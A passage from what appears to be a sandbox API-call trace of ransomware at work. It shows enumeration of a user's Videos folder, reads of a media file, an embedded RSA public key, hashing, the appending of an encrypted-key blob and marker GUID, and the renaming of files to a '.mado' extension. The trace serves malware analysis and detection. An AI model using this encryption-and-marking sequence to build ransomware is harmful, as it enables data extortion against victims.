Uuid=0x39cfa48) returned 0x0 [0205.606] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.606] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3190) returned 0x3b81690 [0205.606] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66588 [0205.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe928 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b665d0 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe940 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe970 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9b8 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe988 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.607] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe988 | out: hHeap=0x2c0000) returned 1 [0205.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9b8 | out: hHeap=0x2c0000) returned 1 [0205.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9b8 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe988 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe970 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe988 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9b8 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.608] GetCurrentThreadId () returned 0x600 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72d90 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69818 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.608] GetCurrentThreadId () returned 0x600 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9b8 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe970 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe988 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe958 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9d0 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9a0 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9e8 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe970 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9b8 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6ec98 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9e8 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6eec8 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6eb80 [0205.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe970 | out: hHeap=0x2c0000) returned 1 [0205.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74e80 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b730a8 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c88 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b730a8 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9a0 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe9d0 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe988 | out: hHeap=0x2c0000) returned 1 [0205.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe958 | out: hHeap=0x2c0000) returned 1 [0205.611] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3185, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.611] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.612] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.612] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.612] CloseHandle (hObject=0x63c) returned 1 [0205.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\JiGMkp44.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\jigmkp44.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\JiGMkp44.mkv.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\jigmkp44.mkv.mado")) returned 1 [0205.614] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b553250, ftCreationTime.dwHighDateTime=0x1d5dae2, ftLastAccessTime.dwLowDateTime=0xd8edd380, ftLastAccessTime.dwHighDateTime=0x1d5de5c, ftLastWriteTime.dwLowDateTime=0xd8edd380, ftLastWriteTime.dwHighDateTime=0x1d5de5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kMOXX", cAlternateFileName="")) returned 1 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3216b0 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3294350 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67168 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321a68 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321628 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bd78 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3215a0 [0205.614] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46462a10, ftCreationTime.dwHighDateTime=0x1d5e095, ftLastAccessTime.dwLowDateTime=0x5e071110, ftLastAccessTime.dwHighDateTime=0x1d5db6c, ftLastWriteTime.dwLowDateTime=0x5e071110, ftLastWriteTime.dwHighDateTime=0x1d5db6c, nFileSizeHigh=0x0, nFileSizeLow=0x18527, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N3-Ofl.mp4", cAlternateFileName="")) returned 1 [0205.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x32d6360 [0205.615] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\N3-Ofl.mp4") returned=".mp4" [0205.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-Na1oMmnUTFTw3KDwZd\\N3-Ofl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-na1ommnutftw3kdwzd\\n3-ofl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.615] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=99623) returned 1 [0205.615] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.617] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18501, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.617] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.619] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x18527, lpOverlapped=0x0) returned 1 [0205.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.620] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0205.620] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.620] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.620] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.621] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.621] GetLastError () returned 0x0 [0205.621] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.621] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0205.621] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.621] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.621] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.621] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.622] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x18527, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.622] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.622] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.622] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: 